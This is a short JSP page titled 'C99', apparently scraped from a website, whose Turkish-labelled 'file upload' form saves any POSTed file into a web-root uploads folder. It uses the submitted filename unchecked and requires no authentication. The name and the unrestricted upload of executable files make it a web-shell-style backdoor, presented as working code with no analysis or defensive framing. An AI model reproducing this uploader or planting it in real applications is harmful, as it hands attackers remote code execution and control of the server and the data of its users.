C99
<%@ page import="java.io.*, javax.servlet.*, javax.servlet.http.*, javax.servlet.annotation.*" %> <%@ page contentType="text/html;charset=UTF-8" language="java" %> Dosya Yükleme
Dosya Yükleme Formu
<%-- Dosya yükleme işlemi burada yapılır --%> <% String uploadDirectory = application.getRealPath("/") + "uploads"; File uploadDir = new File(uploadDirectory); if (!uploadDir.exists()) { uploadDir.mkdir(); } if (request.getMethod().equalsIgnoreCase("POST")) { Part filePart = request.getPart("file"); String fileName = filePart.getSubmittedFileName(); if (fileName != null && !fileName.isEmpty()) { File file = new File(uploadDir, fileName); try (InputStream input = filePart.getInputStream(); FileOutputStream output = new FileOutputStream(file)) { byte[] buffer = new byte[1024]; int bytesRead; while ((bytesRead = input.read(buffer)) != -1) { output.write(buffer, 0, bytesRead); } } out.println("Dosya başarıyla yüklendi: " + fileName + "
"); } else { out.println("Dosya yükleme başarısız.
"); } } %>-
Home
-
-
Menu